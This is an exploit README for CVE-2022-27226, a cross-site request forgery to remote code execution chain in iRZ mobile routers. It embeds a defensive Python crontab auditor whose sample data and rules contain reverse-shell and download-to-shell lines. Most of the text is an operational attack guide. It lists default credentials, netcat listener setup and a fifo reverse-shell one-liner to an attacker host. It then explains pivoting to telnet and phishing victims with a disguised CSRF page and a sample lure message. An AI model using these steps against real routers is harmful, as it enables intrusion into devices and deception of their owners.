Exploit for CVE-2022-27226

ez-iRZ

Cross Site Request Forgery to Remote Code Execution in iRZ Mobile Routers

Credits

<--Vulnerability Discovery-->

John Jackson

Chris Mack --- [https://github.com/0xHalcyon]

<--Exploit Development-->

Stephen Chavez --- [https://github.com/redragonx/]

Robert Willis

Description

A CSRF issue on iRZ Mobile Routers through 2022-03-16 allows a threat actor to create a crontab entry in the router administration panel. The cronjob will consequently execute the entry on the threat actor's defined interval, leading to remote code execution, allowing the threat actor to gain file system access. In addition, if the router's default credentials aren't rotated or a threat actor discovers valid credentials, remote code execution can be achieved without user interaction.
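
As an added, defender-side example that is not part of this repository: a small Python audit of a router's crontab that flags the cron-resident reverse-shell pattern this vulnerability leaves behind (a named pipe wired to an interactive shell and nc, or a download piped straight into sh) and calls out every-minute schedules. The crontab text and the IP address in it are constructed for the example.

```python
import re

# Constructed sample crontab in busybox "min hour dom mon dow command" form.
# The entries are made up for this example; the third one mirrors the
# fifo + nc reverse-shell line this advisory describes.
SAMPLE_CRONTAB = """\
# min hour dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/1 * * * * rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 198.51.100.7 443 >/tmp/f
30 2 * * 0 /sbin/reboot
* * * * * wget -O- http://198.51.100.7/x | sh
"""

# Each rule: (compiled regex, reason). Tuned to the cron-resident shell
# pattern this advisory describes, not a general-purpose scanner.
RULES = [
    (re.compile(r"\b(mknod|mkfifo)\s+\S+"), "named pipe created by cron job"),
    (re.compile(r"/bin/sh\s+-i"), "interactive shell spawned by cron job"),
    (re.compile(r"(^|[|;&\s])nc\s+\S+\s+\d{1,5}\b"), "netcat to host:port"),
    (re.compile(r"\b(wget|curl)\b.*\|\s*(ba)?sh\b"), "download piped into sh"),
]

def parse_crontab(text):
    """Yield (line_no, schedule, command) for non-comment, non-empty lines."""
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)
        if len(fields) < 6:
            continue  # malformed entry; a real audit would report this too
        yield no, " ".join(fields[:5]), fields[5]

def every_minute(schedule):
    """True for '* * * * *' or '*/1 * * * *' style schedules."""
    minute, hour = schedule.split()[:2]
    return minute in ("*", "*/1") and hour == "*"

def audit_crontab(text):
    """Return findings as dicts: line number, schedule, command, reasons."""
    findings = []
    for no, schedule, cmd in parse_crontab(text):
        reasons = [why for rx, why in RULES if rx.search(cmd)]
        if reasons:
            if every_minute(schedule):
                reasons.append("runs every minute (repeating beacon)")
            findings.append({"line": no, "schedule": schedule,
                             "command": cmd, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']}: {f['command']}\n  -> {', '.join(f['reasons'])}")
```

On a live device the same function can be fed the output of `crontab -l` or the contents of the cron spool directory.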

Pre-execution notes:

Start two netcat listeners before attempting to catch a shell. The crontab, when run, will repeat the same cronjob multiple times and your shell will die on the next cycle. You can't use nohup because the busybox environment is fairly restrictive; alternatively, you could modify the exploit with a different crontab entry interval, but the easiest way to deal with this, without worrying about the crontab interval, is to use multiple listeners for the first reverse shell catch.

It was discovered that in most cases the routers don't have the telnet port open externally. However, once you have remote code execution, you can use telnet to get a working TTY for the most part; you need credentials to do so. If you're using the full CSRF to RCE chain, we recommend building a more comprehensive CSRF PoC template that records the user's login event or the request headers, which may contain the basic authorization header that is translated in the script.

Executing Post Authenticated Remote Code Execution Module (With Credentials)

Default credentials for these routers are typically root:root or admin:admin. If you have credentials, run:

python cve.py

Follow the instructions, which are quite simple, then start two netcat listeners on two separate ports.

nc -lvp 443
nc -lvp 5000

When you catch a reverse shell in the first listener, rerun the reverse shell one liner to gain a persistent shell:

rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost_ip} {second_nc_listener_port} >/tmp/f

Finally, if you have credentials (which you should if you're using this portion of the module) - attempt to pivot to the internally restricted telnet service:

telnet 0.0.0.0

"But what if telnet is exposed externally?" Then log in to the fucking router with the credentials, dumbass.

Executing CSRF to RCE Module (No Credentials)

The instructions for this module are nearly the same as the Post Auth RCE instructions, the major difference being that you don't have credentials.

First and foremost, to exploit this efficiently, you have to understand how it works. CSRF requires user interaction, meaning that you'll need to social engineer someone. There are two potential scenarios: the user is logged in when they click the proof of concept button, or the user isn't logged in. If they are already authenticated to the router, the POST request to create the cronjob will be sent to the API and the user will see a blank page. If they aren't logged in, the user will get a basic authentication prompt, and conveniently enough, the basic auth popup will show the IP of the victim router; if they enter their credentials, it sends the POST request to the API.

We recommend attempting to buy a similar domain if the victim router is hosted on a subdomain, or finding a provider with the same subnet ranges for servers if it's a high-priority target. Refining the CSRF PoC might be worth it for a priority target.

Run the script

python cve.py

Follow the instructions in the script; it will then generate a CSRF template for you. We recommend naming it something a little more covert.

mv poc.new.html index.html

Host the PoC on your server, preferably on the same port as the victim router.

python3 -m http.server 80

Take the link and send it to the victim, ensuring that you append the name of the PoC file to the end of the url:

Hi sweetie, can you login to router pwease:
http://your-ip-in-the-united-states-bcuz-you-didnt-take-my-advice/index.html